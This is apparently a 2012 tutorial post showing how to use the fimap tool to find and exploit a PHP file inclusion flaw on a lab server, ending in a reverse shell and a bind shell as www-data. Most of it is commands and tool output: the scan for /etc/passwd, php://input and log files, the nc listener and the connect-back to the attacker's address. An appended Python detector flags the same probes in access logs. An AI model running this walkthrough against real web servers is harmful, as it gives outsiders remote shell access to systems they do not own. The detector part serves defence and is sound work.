PHP file inclusion vulnerability (2): fimap
Posted 2012-8-26 20:58:13
Installation

    root@Dis9Team:/pen/web# svn checkout http://fimap.googlecode.com/svn/trunk/ fimap
Run a scan:

    root@Dis9Team:/pen/web# cd fimap/src/
    root@Dis9Team:/pen/web/fimap/src# ./fimap.py -u "http://5.5.5.3/lif.php?file=info.php" --enable-blind
    fimap v.1.00_svn (Uitmuntende programmatuur alleen voor jij!)
    :: Automatic LFI/RFI scanner and exploiter
    :: by Iman Karim (fimap.dev@gmail.com)

    Blind FI-error checking enabled.
    SingleScan is testing URL: 'http://5.5.5.3/lif.php?file=info.php'
    [07:07:59] [OUT] Inspecting URL 'http://5.5.5.3/lif.php?file=info.php'...
    [07:07:59] [INFO] Fiddling around with URL...
    [07:07:59] [INFO] Sniper failed. Going blind...
    [07:07:59] [OUT] Possible file inclusion found blindly! -> 'http://5.5.5.3/lif.php?file=/etc/passwd' with Parameter 'file'.
    [07:07:59] [OUT] Identifying Vulnerability 'http://5.5.5.3/lif.php?file=info.php' with Parameter 'file' blindly...
    [07:07:59] [WARN] Unknown language - Autodetecting...
    [07:07:59] [INFO] Autodetect thinks this could be a PHP-Script...
    [07:07:59] [INFO] If you think this is wrong start fimap with --no-auto-detect
    [07:07:59] [INFO] Testing file '/etc/passwd'...
    [07:07:59] [INFO] Testing file '/proc/self/environ'...
    [07:07:59] [INFO] Testing file 'php://input'...
    [07:07:59] [INFO] Testing file '/var/log/apache2/access.log'...
    [07:07:59] [INFO] Testing file '/var/log/apache/access.log'...
    [07:07:59] [INFO] Testing file '/var/log/httpd/access.log'...
    [07:07:59] [INFO] Testing file '/var/log/apache2/access_log'...
    [07:07:59] [INFO] Testing file '/var/log/apache/access_log'...
    [07:07:59] [INFO] Testing file '/var/log/httpd/access_log'...
    [07:07:59] [INFO] Testing file '/apache/logs/access.log'...
    [07:07:59] [INFO] Testing file '/apache/logs/access_log'...
    [07:07:59] [INFO] Testing file '/apache2/logs/access.log'...
    [07:07:59] [INFO] Testing file '/apache2/logs/access_log'...
    [07:07:59] [INFO] Testing file '/etc/httpd/logs/access_log'...
    [07:07:59] [INFO] Testing file '/etc/httpd/logs/access.log'...
    [07:07:59] [INFO] Testing file '/var/httpd/logs/access_log'...
    [07:07:59] [INFO] Testing file '/var/httpd/logs/access.log'...
    [07:07:59] [INFO] Testing file '/var/www/logs/access_log'...
    [07:07:59] [INFO] Testing file '/var/www/logs/access.log'...
    [07:07:59] [INFO] Testing file '/usr/local/apache/logs/access_log'...
    [07:07:59] [INFO] Testing file '/usr/local/apache/logs/access.log'...
    [07:07:59] [INFO] Testing file '/usr/local/apache2/logs/access_log'...
    [07:07:59] [INFO] Testing file '/usr/local/apache2/logs/access.log'...
    [07:07:59] [INFO] Testing file '/var/log/access_log'...
    [07:07:59] [INFO] Testing file '/var/log/access.log'...
    [07:07:59] [INFO] Testing file '/logs/access.log'...
    [07:07:59] [INFO] Testing file '/logs/access_log'...
    [07:07:59] [INFO] Testing file '/opt/lampp/logs/access_log'...
    [07:07:59] [INFO] Testing file '/opt/lampp/logs/access.log'...
    [07:07:59] [INFO] Testing file '/opt/xampp/logs/access.log'...
    [07:07:59] [INFO] Testing file '/opt/xampp/logs/access_log'...
    [07:07:59] [INFO] Testing file '/var/log/auth.log'...
    [07:07:59] [INFO] Testing file '/var/log/secure'...
    [07:07:59] [INFO] Testing file 'http://www.phpbb.de/index.php'...
    ##########################################################
    #[1] Possible PHP-File Inclusion                         #
    ##########################################################
    #::REQUEST                                               #
    #  [URL]        http://5.5.5.3/lif.php?file=info.php     #
    #  [HEAD SENT]                                           #
    #::VULN INFO                                             #
    #  [GET PARAM]  file                                     #
    #  [PATH]       Not received (Blindmode)                 #
    #  [OS]         Unix                                     #
    #  [TYPE]       Blindly Identified                       #
    #  [TRUNCATION] Not tested.                              #
    #  [READABLE FILES]                                      #
    #                   [0] /etc/passwd                      #
    #                   [1] php://input                      #
    #                   [2] http://www.phpbb.de/index.php    #
    ##########################################################
    root@Dis9Team:/pen/web/fimap/src#
Exploitation

    root@Dis9Team:/pen/web/fimap/src# ./fimap.py -x
    fimap v.1.00_svn (Uitmuntende programmatuur alleen voor jij!)
    :: Automatic LFI/RFI scanner and exploiter
    :: by Iman Karim (fimap.dev@gmail.com)

    ###############################################
    #:: List of Domains ::                        #
    ###############################################
    #[1] 5.5.5.3 (Linux 2.6.35-22-generic-pae)    #
    #[q] Quit                                     #
    ###############################################
    WARNING: Some domains may be not listed here because dynamic_rfi is not configured!
    Choose Domain:
Select the host: choose 1.

Select the URL:

    Choose Domain: 1
    #############################################################################################
    #:: FI Bugs on '5.5.5.3' ::                                                                 #
    #############################################################################################
    #[1] URL: '/lif.php?file=info.php' injecting file: 'php://input' using GET-param: 'file'    #
    #[q] Quit                                                                                   #
    #############################################################################################
    WARNING: Some bugs are suppressed because dynamic_rfi is not configured!
    Choose vulnerable script:
Choose 1:

    Choose vulnerable script: 1
    [07:13:08] [INFO] Testing PHP-code injection thru POST...
    [07:13:08] [OUT] PHP Injection works! Testing if execution works...
    [07:13:08] [INFO] Testing execution thru 'popen[b64]'...
    [07:13:08] [OUT] Execution thru 'popen[b64]' works!
    ####################################################
    #:: Available Attacks - PHP and SHELL access ::    #
    ####################################################
    #[1] Spawn fimap shell                             #
    #[2] Spawn pentestmonkey's reverse shell           #
    #[3] [Test Plugin] Show some info                  #
    #[q] Quit                                          #
    ####################################################
    Choose Attack:
Backdoor options: the first is a bind shell, the second a reverse shell. Choose 2.
Start the listener first:

    root@Dis9Team:/pen/web/fimap/src# nc -v -l 1234
Enter the connect-back settings:

    Choose Attack: 2
    IP Address to connect back to: 5.5.5.2
    The Port it should connect back: 1234
    Make your netcat server ready and hit enter...
Shell obtained:

    root@Dis9Team:/pen/web/fimap/src# nc -v -l 1234
    Connection from 5.5.5.3 port 1234 [tcp/*] accepted
    Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
    15:14:12 up  1:15,  2 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
    root     tty1                      13:59    1:14m  0.15s  0.10s -bash
    root     pts/0    5.5.5.2          14:00   17:53   0.34s  0.34s -bash
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: can't access tty; job control turned off
    $ id
The first option, the bind shell, works the same way:

    ####################################################
    #:: Available Attacks - PHP and SHELL access ::    #
    ####################################################
    #[1] Spawn fimap shell                             #
    #[2] Spawn pentestmonkey's reverse shell           #
    #[3] [Test Plugin] Show some info                  #
    #[q] Quit                                          #
    ####################################################
    Choose Attack: 1
    Please wait - Setting up shell (one request)...
    -------------------------------------------
    Welcome to fimap shell!
    Better don't start interactive commands! ;)
    Also remember that this is not a persistent shell.
    Every command opens a new shell and quits it after that!
    Enter 'q' to exit the shell.
    -------------------------------------------
    fishell@www-data:/var/www$> pwd
    /var/www
    fishell@www-data:/var/www$>
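As an added example (not part of the original post and not fimap's own code), the following Python detector runs over constructed Apache access-log lines and flags the same probe patterns the scan output above shows fimap sending to the vulnerable `file` parameter: sensitive local files such as /etc/passwd and /proc/self/environ, PHP stream wrappers such as php://input, web-server log paths (the log-poisoning candidates), remote URLs, and path traversal. The log lines, client addresses and function names are constructed for this example; a scanner of this kind typically issues many distinct indicators from one client within seconds, which is what `summarize()` surfaces per client.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlparse

# Indicator sets drawn from the file list fimap probes in the post above.
SENSITIVE_FILES = ("/etc/passwd", "/proc/self/environ", "/var/log/auth.log", "/var/log/secure")
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip)://", re.IGNORECASE)
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\)")
LOG_FILE_RE = re.compile(r"access[._]log$|/logs?/", re.IGNORECASE)

# Apache "combined" format: client, ident, user, [timestamp], "request line", status, size, ...
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one scanner-like client (5.5.5.2 as in the post's lab),
# one benign client, and one client sending an encoded traversal string.
SAMPLE_LOG = """\
5.5.5.2 - - [26/Aug/2012:07:07:59 +0000] "GET /lif.php?file=info.php HTTP/1.1" 200 1532
5.5.5.2 - - [26/Aug/2012:07:07:59 +0000] "GET /lif.php?file=/etc/passwd HTTP/1.1" 200 2011
5.5.5.2 - - [26/Aug/2012:07:07:59 +0000] "GET /lif.php?file=/proc/self/environ HTTP/1.1" 200 1532
5.5.5.2 - - [26/Aug/2012:07:07:59 +0000] "GET /lif.php?file=php://input HTTP/1.1" 200 1532
5.5.5.2 - - [26/Aug/2012:07:07:59 +0000] "GET /lif.php?file=/var/log/apache2/access.log HTTP/1.1" 200 1532
5.5.5.2 - - [26/Aug/2012:07:07:59 +0000] "GET /lif.php?file=http://www.phpbb.de/index.php HTTP/1.1" 200 9870
5.5.5.2 - - [26/Aug/2012:07:13:08 +0000] "POST /lif.php?file=php://input HTTP/1.1" 200 411
10.0.0.7 - - [26/Aug/2012:07:20:01 +0000] "GET /lif.php?file=about.php HTTP/1.1" 200 1201
10.0.0.9 - - [26/Aug/2012:07:21:15 +0000] "GET /lif.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2011
"""


def classify_value(value: str) -> Optional[str]:
    """Label one query-parameter value with the inclusion indicator it matches, or None."""
    decoded = unquote(unquote(value))  # parse_qs decodes once; undo a second layer too
    if WRAPPER_RE.match(decoded):
        return "php-wrapper"
    if REMOTE_RE.match(decoded):
        return "remote-include"
    if TRAVERSAL_RE.search(decoded):
        return "path-traversal"
    low = decoded.lower()
    if any(path in low for path in SENSITIVE_FILES):
        return "sensitive-file"
    if LOG_FILE_RE.search(low):
        return "log-poisoning-target"
    return None


def scan_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return client, path, status and indicator hits, or None."""
    match = LINE_RE.match(line)
    if not match:
        return None
    parsed = urlparse(match.group("target"))
    hits = []
    for name, values in parse_qs(parsed.query, keep_blank_values=True).items():
        for value in values:
            label = classify_value(value)
            if label:
                hits.append((name, label, value))
    if not hits:
        return None
    return {"client": match.group("client"), "path": parsed.path,
            "status": match.group("status"), "hits": hits}


def summarize(lines) -> dict:
    """Collect the distinct indicator labels seen per client address."""
    per_client: dict = {}
    for line in lines:
        result = scan_line(line)
        if result:
            labels = {label for _, label, _ in result["hits"]}
            per_client.setdefault(result["client"], set()).update(labels)
    return {client: sorted(labels) for client, labels in per_client.items()}


if __name__ == "__main__":
    for client, labels in summarize(SAMPLE_LOG.splitlines()).items():
        print(f"{client}: {', '.join(labels)}")
```

The detector only looks at query strings, so the POST-body stage of the php://input exploit is not visible here; pairing the `php-wrapper` label with a POST request to the same script, as in the sample's last 5.5.5.2 line, is the signal to alert on.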
Posted 2012-9-9 01:50:39
Note

    root@Dis9Team:/pen/web# svn checkout http://fimap.googlecode.com/svn/trunk/ fimap
There is a space before fimap; otherwise it reports that the file cannot be found.

    ./fimap.py -x

is actually:

    ./fimap.py -X